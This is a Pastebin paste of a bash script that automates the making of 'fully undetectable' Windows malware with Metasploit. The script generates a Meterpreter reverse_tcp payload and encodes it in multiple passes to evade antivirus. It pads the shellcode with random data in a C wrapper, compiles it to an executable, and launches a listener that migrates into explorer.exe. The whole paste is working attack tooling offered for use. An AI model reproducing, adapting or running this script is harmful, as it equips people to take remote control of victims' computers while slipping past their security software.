SHARE
TWEET

fud payload generator for backtrack

a guest Feb 11th, 2012 968 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # source : http://www.coresec.org/2011/11/09/fud-payload-generator-for-backtrack/
  3. # To install the following if they are not installed :
  4. # apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
  5.  
  6. echo "************************************************************"
  7. echo "    Automatic  shellcode generator - FOR METASPLOIT         "
  8. echo "                  By Astr0baby 2011                         "
  9. echo "  With some Randomic gravy and sauce to bypass Antivirus    "  
  10. echo "    For Automatic Teensy programming and deployment         "
  11. echo "************************************************************"
  12.  
  13. rm -rf ShellCode
  14.  
  15. echo "Here is a network device list available on yor machine"
  16. cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
  17. echo -e "What network interface are we gonna use ?  \c"
  18. read interface
  19. echo -e "What Port Number are we gonna listen to? : \c"
  20. read port
  21. echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
  22. read seed
  23. echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c"
  24. read enumber
  25. # Get OS name
  26. OS=`uname`
  27. IO="" # store IP
  28. case $OS in
  29.    Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
  30.    *) IP="Unknown";;
  31. esac
  32. #echo "$IP"
  33. ./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
  34. mkdir ShellCode
  35. mv test.c ShellCode
  36. cd ShellCode
  37. #Replacing plus signs at the end of line
  38. sed -e 's/+/ /g' test.c > clean.c
  39. sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
  40. echo "#include <stdio.h>" >> temp
  41. echo 'unsigned char ufs[]=' >> temp
  42. for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
  43. sed -i 's/$/"/' temp2
  44. sed -i 's/^/"/' temp2  
  45. echo  ';' >> temp2  
  46. cat temp2 >> temp
  47. cat ready.c >> temp
  48. mv temp ready2.c
  49. echo ";" >> ready2.c
  50. echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
  51. mv ready2.c final.c
  52. echo 'unsigned char tap[]=' > temp3
  53. for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
  54. sed -i 's/$/"/' temp4
  55. sed -i 's/^/"/' temp4
  56. echo  ';' >> temp4
  57. cat temp4 >> temp3
  58. cat temp3 >> final.c  
  59. #Cleanup
  60. rm -f clean.c
  61. rm -f test.c
  62. rm -f ready.c
  63. rm -f rand.c
  64. rm -f temp2
  65. rm -f temp3
  66. rm -f temp4
  67.  
  68. /usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
  69. mv final.exe $RANDOM.exe
  70. filex=`ls -ct1 | head -1`
  71. sumx=`sha1sum $filex`
  72. echo $filex "...generated in ShellCode subfolder"
  73. echo $filex "sha1checksum is .." $sumx  
  74. strip --strip-debug $filex
  75. cd ..
  76. echo "      starting the meterpreter listener..."
  77. sleep 2
  78. ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2  explorer.exe'  E
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top